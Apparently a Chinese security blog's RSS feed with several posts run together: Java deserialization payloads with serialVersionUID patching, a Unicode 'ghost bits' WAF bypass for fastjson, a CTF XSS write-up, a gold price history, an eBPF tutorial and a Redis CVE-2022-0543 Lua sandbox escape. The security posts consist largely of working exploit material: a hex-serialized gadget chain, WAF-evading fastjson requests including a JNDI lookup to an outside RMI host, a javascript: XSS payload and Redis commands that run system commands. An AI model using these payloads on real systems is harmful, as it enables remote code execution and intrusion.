我的私有RSS订阅服务器已经订阅了上千个技术博客,每天需要做的就是简单看一下这些大博主都写了些什么,然后把思路记录在本地Obsidian服务器上,也就是说,从今往后,我的博客将不会再输出以下类型的文章
如果想要看上面这类的文章,可以关闭我这个博客了,以后这个博客只会发布一些日常生活记录,分享一些理财的操作,并且会保持纯手写的习惯,拒绝任何AI辅助生成出现,不过偶尔也会发一些我认为技术已经过时的或者没啥用的文章(2026年02月04日17时55分20秒补充)
最后来说说为什么这么做,其实很简单,我刚才我很想啊,就是我每一次碰到你们我就讲中国有一句话叫「闷声大发财」,我就什么话也不说。這是最好的!但是我想,我见到你们这样热情啊,一句话不说也不好,所以你刚才你一定要————永远怀念🕯️
最后,祝大家新年快乐!早日A9!
2026年04月15日19时07分54秒补充
向伟大的安全开源者们致敬🫡,感谢开源项目为我带来新的灵感🙏,又可以学厂商接着抄代码咯😋
serialVersionUID 不同的问题这也就是一个依赖可能有多个版本,而每个版本中的同名类,可能会有变化。serialVersionUID(后面简称suid)就是为了解决这个问题而出现的。这表现在,本地通过cb1.9.4生成的利用链,到服务端cb1.8.3就打不了 - Java反序列化链探测
这里大家都知道serialVersionUID(简称 suid)不匹配本质上是 Java 的一种安全保护机制,旨在确保序列化对象和接收端的类定义是二进制兼容的,所以实战遇到的时候还是挺头疼的,而且打红的时候都是黑盒,你压根不知道版本是多少,但还是有绕过的手法的
在开始前,我们得先知道为什么 SUID 会变,如果钻研底层,会发现 JVM 判断两个类是否相同,除了看类型还会看 SUID,这里分两种情况
private static final long serialVersionUID = 1L;,那么只要这个值不懂,即使类成员变了,反序列化也能成功(当然不排除会抛出类型转换异常)例如下面这条链子我们可以用 https://github.com/NickstaDB/SerializationDumper 这个工具来查看具体的 suid
1 | java -jar SerializationDumper-v1.14.jar aced0005737200176a6176612e7574696c2e5072696f72697479517565756594da30b4fb3f82b103000249000473697a654c000a636f6d70617261746f727400164c6a6176612f7574696c2f436f6d70617261746f723b7870000000027372002b6f72672e6170616368652e636f6d6d6f6e732e6265616e7574696c732e4265616e436f6d70617261746f72e3a188ea7322a4480200024c000a636f6d70617261746f7271007e00014c000870726f70657274797400124c6a6176612f6c616e672f537472696e673b78707372003f6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e636f6d70617261746f72732e436f6d70617261626c65436f6d70617261746f72fbf49925b86eb13702000078707400106f757470757450726f706572746965737704000000037372003a636f6d2e73756e2e6f72672e6170616368652e78616c616e2e696e7465726e616c2e78736c74632e747261782e54656d706c61746573496d706c09574fc16eacab3303000649000d5f696e64656e744e756d62657249000e5f7472616e736c6574496e6465785b000a5f62797465636f6465737400035b5b425b00065f636c6173737400125b4c6a6176612f6c616e672f436c6173733b4c00055f6e616d6571007e00044c00115f6f757470757450726f706572746965737400164c6a6176612f7574696c2f50726f706572746965733b787000000000ffffffff757200035b5b424bfd19156767db37020000787000000001757200025b42acf317f8060854e0020000787000000502cafebabe00000034002b0a0007001e0a001f00200800210a001f00220700230700240700250100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100104c6578702f63616c63756c61746f723b01000d537461636b4d61705461626c650700240700230100097472616e73666f726d010072284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b5b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b29560100016401002d4c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b010001730100425b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b0100a6284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b295601000264690100354c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b0100414c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b01000a536f7572636546696c6501000f63616c63756c61746f722e6a6176610c000800090700260c002700280100126f70656e202d612043616c63756c61746f720c0029002a0100136a6176612f6c616e672f457863657074696f6e01000e6578702f63616c63756c61746f72010040636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f72756e74696d652f41627374726163745472616e736c65740100116a6176612f6c616e672f52756e74696d6501000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b01000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0021000600070000000000030001000800090001000a0000006600020002000000122ab70001b800021203b6000457a700044cb100010004000d001000050003000b0000001200040000000600040008000d00090011000a000c0000000c000100000012000d000e0000000f000000100002ff001000010700100001070011000001001200130001000a0000003f0000000300000001b100000002000b0000000600010000000c000c00000020000300000001000d000e000000000001001400150001000000010016001700020001001200180001000a000000490000000400000001b100000002000b0000000600010000000e000c0000002a000400000001000d000e000000000001001400150001000000010019001a0002000000010016001b00030001001c00000002001d7074000550776e6564707701007871007e000d78 |
简单整理一下
1 | java.util.PriorityQueue |
这个是比较直白的方法,通过报错信息,一般是 local class incompatible: stream classdesc serialVersionUID = X, local class serialVersionUID = Y 则可以确定服务端的版本,然后下载对应的 jar 包,或者 maven 重新拉一个,然后本地切换依赖重新生成 payload
URLDNS 链是 Java 反序列化中的“敲门砖”。由于它只依赖 JDK 自带的类(如 java.util.HashMap),而 JDK 核心类的 SUID 在不同次要版本间通常保持高度稳定性,因此它不受第三方库版本波动的影响。
先用正常的环境打一遍,依赖如下
1 | <dependency> |
然后再用高版本 cb 去打低版本 cb 会发现报错了
这时候就得动态修改成服务端一样的 serialVersionUID 了,具体怎么做了,直接用 Javassist 是个不错的选,这里编写一个 fixSUID() 函数来动态修改我们的 serialVersionUID
1 | public static void fixSUID() throws Exception { |
然后在链子前面加上这个函数用于动态修改
1 | public static Object getPayload() throws Exception { |
接着重新跑一条出来
1 | java -jar SerializationDumper-v1.14.jar aced0005737200176a6176612e7574696c2e5072696f72697479517565756594da30b4fb3f82b103000249000473697a654c000a636f6d70617261746f727400164c6a6176612f7574696c2f436f6d70617261746f723b7870000000027372002b6f72672e6170616368652e636f6d6d6f6e732e6265616e7574696c732e4265616e436f6d70617261746f72cf8e0182fe4ef17e0200024c000a636f6d70617261746f7271007e00014c000870726f70657274797400124c6a6176612f6c616e672f537472696e673b78707372003f6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e636f6d70617261746f72732e436f6d70617261626c65436f6d70617261746f72fbf49925b86eb13702000078707400106f757470757450726f706572746965737704000000037372003a636f6d2e73756e2e6f72672e6170616368652e78616c616e2e696e7465726e616c2e78736c74632e747261782e54656d706c61746573496d706c09574fc16eacab3303000649000d5f696e64656e744e756d62657249000e5f7472616e736c6574496e6465785b000a5f62797465636f6465737400035b5b425b00065f636c6173737400125b4c6a6176612f6c616e672f436c6173733b4c00055f6e616d6571007e00044c00115f6f757470757450726f706572746965737400164c6a6176612f7574696c2f50726f706572746965733b787000000000ffffffff757200035b5b424bfd19156767db37020000787000000001757200025b42acf317f8060854e0020000787000000502cafebabe00000034002b0a0007001e0a001f00200800210a001f00220700230700240700250100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100104c6578702f63616c63756c61746f723b01000d537461636b4d61705461626c650700240700230100097472616e73666f726d010072284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b5b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b29560100016401002d4c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b010001730100425b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b0100a6284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b295601000264690100354c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b0100414c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b01000a536f7572636546696c6501000f63616c63756c61746f722e6a6176610c000800090700260c002700280100126f70656e202d612043616c63756c61746f720c0029002a0100136a6176612f6c616e672f457863657074696f6e01000e6578702f63616c63756c61746f72010040636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f72756e74696d652f41627374726163745472616e736c65740100116a6176612f6c616e672f52756e74696d6501000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b01000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0021000600070000000000030001000800090001000a0000006600020002000000122ab70001b800021203b6000457a700044cb100010004000d001000050003000b0000001200040000000600040008000d00090011000a000c0000000c000100000012000d000e0000000f000000100002ff001000010700100001070011000001001200130001000a0000003f0000000300000001b100000002000b0000000600010000000c000c00000020000300000001000d000e000000000001001400150001000000010016001700020001001200180001000a000000490000000400000001b100000002000b0000000600010000000e000c0000002a000400000001000d000e000000000001001400150001000000010019001a0002000000010016001b00030001001c00000002001d7074000550776e6564707701007871007e000d78 |
然后发送 poc,会发现打成功了
这个中文叫做幽灵比特位,在 Black Hat Asia 2026 被 1ue 和 浅蓝 披露,其原理就是 Java 中 char 转 byte 时高位静默丢弃的底层缺陷,简单来说就是字节转换的问题,在 Java 中 char 为 16 位字节,byte 仅 8 位,如果我们把代码强制转换 (byte) ch 或 ch & 0xfffffff,则高 8 位直接丢失,只保留低 8 位,这脑洞能想出来也是真的牛逼,藏了这么久
攻击者用Unicode 字符(中文 / 特殊符号) 绕过 WAF 检测,后端执行时低 8 位还原为危险 ASCII:
WAF 看到中文,后端执行恶意代码,这就是幽灵比特位的核心,以汉字「爻」(U+2F58)为例:
1 | 爻 → U+2F58 → 二进制:00101111 | 00111010 |
影响算是特别大吧,很多场景都能 bypass
笔者这里用的是 fastjson 1.2.83 (开启 autotype) + commons-collections4 (4.0),这里先打个基本的 calculator
1 | import com.alibaba.fastjson.JSON; |
这里用某亭的 waf 测测看
可以发现很容易就被拦了,平时还是得多培养一些钻研精神,如果当时挖的 rce 知道有这种绕过方法就好了,然后来看一下绕过方法,网上都有轮子,随便找个跑一下就行(别被投毒了),或者用我这个精简版的
1 | import urllib.parse |
这就很有意思了,waf 看见的只会认为这是一串合理的中文,完全不知道是一个 payload,所以绕过率还是挺高的,回到刚才那个场景,简单启动一个 http 服务,然后塞入 poc
1 | GET /exploit?data=%7B%22癀type%22%3A%22BitsTest%24Calculator%22%7D |
实验环境代码如下
1 | import com.alibaba.fastjson.JSON; |
你可以这样子发送
1 | GET /exploit?data=%7B%22陀陴陹陰陥%22%3A%22BitsTest%24Calculator%22%7D |
还挺好玩的,试试看能不能绕 waf
1 | GET /exploit?data=%7B%22%40type%22%3A%22BitsTest%24Calculator%22%2C%20%20%20%22b%22%3A%7B%0D%0A%20%20%20%20%20%20%20%20%22%40type%22%3A%22com%2Esun%2Erowset%2EJdbcRowSetImpl%22%2C%0D%0A%20%20%20%20%20%20%20%20%22dataSourceName%22%3A%22rmi%3A%2F%2Fnmsl%2Ecnm%3A9999%2FExploit%22%2C%0D%0A%20%20%20%20%20%20%20%20%22autoCommit%22%3Atrue%0D%0A%20%20%20%20%7D%7D |
然后尝试中文绕过
1 | GET /exploit?data=%7B%22%40type%22%3A%22BitsTest%24Calculator%22%2C%22b%22%3A%7B%22%40type%22%3A%22%E9%99%A3%E9%99%AF%E9%99%AD%E9%98%AE%E9%99%B3%E9%99%B5%E9%99%AE%E9%98%AE%E9%99%B2%E9%99%AF%E9%99%B7%E9%99%B3%E9%99%A5%E9%99%B4%E9%98%AE%E9%99%8A%E9%99%A4%E9%99%A2%E9%99%A3%E9%99%92%E9%99%AF%E9%99%B7%E9%99%93%E9%99%A5%E9%99%B4%E9%99%89%E9%99%AD%E9%99%B0%E9%99%AC%22%2C%22dataSourceName%22%3A%22%E9%99%B2%E9%99%AD%E9%99%A9%E9%98%BA%E9%98%AF%E9%98%AF%E9%99%AE%E9%99%AD%E9%99%B3%E9%99%AC%E9%98%AE%E9%99%A3%E9%99%AE%E9%99%AD%E9%98%BA%E9%98%B9%E9%98%B9%E9%98%B9%E9%98%B9%E9%98%AF%E9%99%85%E9%99%B8%E9%99%B0%E9%99%AC%E9%99%AF%E9%99%A9%E9%99%B4%22%2C%22autoCommit%22%3Atrue%7D%7D |
网上防御姿势都写了,这里我就不贴出来了,给大家一个 prompt 吧,用 ai 来分析就行
1 |
CVE编号:CVE-2026-31431
这
https://i.blackhat.com/Asia-26/Presentations/Asia-26-Bai-Cast-Attack-Ghost-Bits-4.23.pdf
]]>挑战源代码如下,需要的自取
1 | const express = require('express'); |
从代码层面上看很容易知道我们需要的漏洞点,无非就两个,一个任意链接跳转,一个就是任意连接+伪协议引发的XSS漏洞,但是代码中明显限制了一个条件,如果跳转地址不等于 https://pwnbox.xyz/docs 那就会失效,并且我们注意到浏览器是用 new URLSearchParams(window.location.search).get("redirect_uri"); 来进行渲染的,我们查一下这个函数的API,会发现get()方法会返回与参数关联的第一个值,也就是说如果同一个键出现多次,他都只会返回第一个值
https://developer.mozilla.org/en-US/docs/Web/API/URLSearchParams/get
这时候肯定就要想办法绕过了,qs 存在一个特性,例如我们发送 foo[x]=bar 则会被解析成一个对象,也就是 q.query.foo = { x: 'bar' };,
1 | { |
如果熟悉原型污染的话,应该对上面很熟悉,我们阅读 qs 的文档发现官方留了这么一句话,有这么一个参数 arrayLimit,默认值为 1000
1 | For similar reasons, by default qs will only parse up to 1000 parameters. This can be overridden by passing a parameterLimit option: |
所以可以利用这个特性来做一个绕过
当我们发送一个超长数组超过索引限制后,qs 就会将其解析成对象,然后浏览器端的 URLSearchParams 他不会识别 [] 语法,所以也就不存在 arrayList,对于浏览器来说 URL 结尾处的 &redirect_uri=javascript:alert('1') 是一个名为 redirect_uri 的 key,当执行 new URLSearchParams(window.location.search).get("redirect_uri") 时,浏览器会忽略前面的乱七八糟的参数,直接精准命中了末尾的 javascript:alert('1'),所以最后的 payload
1 | GET /?%5Bredirect_uri%5D=https://pwnbox.xyz/docs&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&a=1&redirect_uri=javascript:alert('1') |
最后
写着玩的,不要当真
截止(2026年04月15日 18时24分09秒)
国际金价为
上海交易所金价为
开始之前,我们先来回顾一下黄金每次涨跌都发生了什么事件,黄金的走向离不开四个关键词
战争、通胀、危机、货币体系
简单拆解一下,会现在1970年,国际金价为 $35 ,接着往后发生了什么事件呢? 布雷顿森林体系瓦解(1971年) + 两次石油危机,当然还有当时的美国总统尼克松宣布美元与黄金脱钩,叠加中东局势混乱导致的全球大通胀,于是国际金价在 1980 年飙升至 $850 的天点
主要是 1980 年到 2000 年,这几年金价比较平稳,甚至走向了低位,主要事件有 美联储铁腕加息 + 苏联解体 + 互联网泡沫,沃尔克通过极高的利率强行压制了通胀,美元重拾威信,这二十年里,世界相对和平,经济高速增长,大家觉得“拿金子不如买股票”,这也提出了一个逻辑盛世买股票,乱世买黄金,这一时期是黄金最落魄的岁月
主要集中在 2008 年至 2011 年,这期间因为次贷危机和量化宽松(QE),以及雷曼兄弟倒闭,全球金融体系几近崩盘,为了救市,各国央行开始疯狂印钱(QE政策),金价从 2008 年的 $700 左右一路狂奔到 2011 年的 $1900。
事件主要集中在 2013 年至 2015 年,这里的核心事件是美联储宣布缩减 QE + 全球经济复苏,如果你早些年网上冲浪的话,应该会记得 2013 年中国大妈疯狂抢金,当时金价单日暴跌,主要因为市场预期美国要加息了,资金撤离金市回流美元,但是加息是黄金的天敌,因为黄金不生利息,当存款利息变高时,持金成本就变大了
别急,感觉以后还会有更极端的,这几年想必大家都知道了,就是 2020~2026 年,主要的事件有COVID-19 疫情 + 俄乌冲突 + 全球去美元化 + 地缘政治,具体在 2020 年发生了什么,大家都知道,全球停摆,美国无限量供应流动性,金价首次破 $2000,2022-2023年,尽管美联储疯狂加息,但地缘政治风险和各国央行(尤其是中东和亚洲)以前所未有的速度囤积黄金,导致金价完全不听加息的劝阻,黄金不再只是投资,而是各国防止被金融制裁的盾牌,再往后 2023 年到 2026 年,各种银行业危机、中东局势突变、央行狂买、美联储降息、大选、SGE溢价、关税与贸易站、信用对冲、金价 $5000、2026年1月30日黑色星期五等等事件,由此可以引出下文
纵观整个历史,我们可以通过复盘发现,黄金有一个三合一的公式
由此可见,我们追求的不是衡量黄金变贵了多少,二是衡量信用货币萎缩了多少,现在看来,历史不会简单重复,你也不可能通过所谓的神机妙算算出黄金的走势,下一次暴跌或者暴涨通常发生在全球达成新的和平契约或者某种新技术革命让经济再次爆炸增长的时候,现在看来,这两者似乎都还走在路上,也有可能已经开始了
理性投资,本文仅作交流参考
eBPF(extened Berkeley Packet Filter)是一项革命性的技术,起源于 Linux 内核,它可以在特权上下文中(如操作系统内核)运行沙盒程序
简单来说就是可以通过在操作系统内核中执行沙盒程序,在不改变内核源码或加载内核模块的前提下安全便携的扩展内核能力
从历史上看,由于内核具有监督和控制整个系统的特权,操作系统一直是实现可观测性、安全性和网络功能的理想场所。同时,由于操作系统内核的核心地位和对稳定性和安全性的高要求,操作系统内核很难快速迭代发展。因此在传统意义上,与在操作系统本身之外实现的功能相比,操作系统级别的创新速度要慢一些。
程序编写:开发者使用 eBPF 汇编或受限 C 语言编写内核逻辑。由于内核环境的特殊性,编写时需遵循 eBPF 特有的辅助函数(Helpers)和语法约束。
字节码编译:借助 LLVM/Clang 编译器前端及 eBPF 后端,将源代码编译为体系结构无关的 eBPF 字节码(Bytecode),确保程序具备跨内核版本的兼容性。
内核加载:通过调用 bpf() 系统调用,将生成的字节码注入内核。在正式运行前,内核验证器(Verifier)会对指令进行静态分析,确保其安全且不会导致系统崩溃。
安全验证 (Verifier):内核验证器对注入的字节码进行严格的静态分析。它会检查代码是否存在死循环、非法内存访问或堆栈溢出,确保内核的绝对安全。
即时编译 (JIT Compiler):通过验证后,JIT 编译器将通用字节码翻译成当前 CPU 架构(如 x86, ARM)的原生机器码,以实现近乎原生的运行性能。
挂载与触发 (Hooks):程序被附加到特定的内核事件(如网络包到达、系统调用、kprobes 等)。当事件触发时,eBPF 程序立即执行。
状态共享 (Maps):程序在执行过程中,通过 eBPF Maps 将处理结果(如统计数据、监控日志)传回用户态,实现两个层级的数据闭环。
纯手写 bpf() 太几把费劲了,这里看阿里的简单教程理解一下,安装环境
1 | sudo apt update |
用下面这行指令来实时监控系统里面谁在执行 openat 系统调用(即谁在打开文件)
1 | sudo bpftrace -e 'tracepoint:syscalls:sys_enter_openat { printf("%s (PID %d) is opening a file\n", comm, pid); }' |
我们在新的终端页输入命令上面这个监控就会实时弹出,BCC 允许我们自己用 C 来编写内核逻辑,用 Python 来写用户态逻辑,先安装 BCC
1 | sudo apt install -y bpfcc-tools python3-bpfcc |
编写一个程序,一样的逻辑会监控所有 clone() 系统调用(即创建新的进程)
1 | # hello_ebpf.py |
懂了上面这些逻辑后我们可以简单做一个防火墙出来,这一点需要你提前知道一些计算机网络的小知识,这里用 XDP(eXpress Data Path)来做防火墙,XDP 运行在网卡驱动层,甚至在内核协议栈处理数据包之前,这意味着可以以极高的性能丢弃(Drop)攻击包,而不会消耗 CPU 去解析复杂的协议。
1 | from bcc import BPF |
简单拓展一下 XDP 防火墙的知识
XDP_PASS:允许通过
XDP_DROP:原地丢弃(防火墙核心)
XDP_TX:原路发回(可用于反射攻击防护)
XDP_REDIRECT:转发到其他网卡
https://ebpf.io/zh-hans/applications/
常见的指令有这几个
正常来说,我们可以这样子执行
1 | eval '任意表达式' 0 |
系统就会解析 lua 代码来执行任意代码,比如我们可以尝试一下 lua 命令执行(这里默认是禁用了 os 和 io 库),所以执行 eval 'return io.popen("whoami;id")' 0,会报错
那么有没有啥版本可以绕过这个限制呢?答案是利用 CVE-2022-0543 这个沙盒逃逸漏洞,简单来说,它的根源不在于 Redis 本身,而在于 Debian 及 Ubuntu 等发行版在打包 Redis 时,为了减小体积,将 Lua 解释器作为一个动态链接库(Shared Library)加载,这导致了一个致命问题,在正常的 Redis Lua 沙箱中,原本应该被禁用的 package 库(它可以加载外部库并执行代码)在某些环境下是可用的
先来看看利用的 exp
1 | EVAL 'local os_execute = package.loadlib("/lib/x86_64-linux-gnu/libc.so.6", "system"); os_execute("whoami > /tmp/out");' 0 |
可以借助 loadlib 函数来动态加载链接库,例如加载 /usr/lib/x86_64-linux-gnu/liblua5.1.so.0 里面的 luaopen_io 函数,从而获得 io 库来执行任意命令
1 | local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); |
这样子就能达到 RCE 的目的,我们启动一个 Debian 11,然后装上 Redis,早期的 Redis Server是受到影响的,启动环境复现
1 | docker pull docker.m.daocloud.io/library/debian:11 |
接着执行
1 | redis-cli |
如果用高版本 Redis 执行则会显示
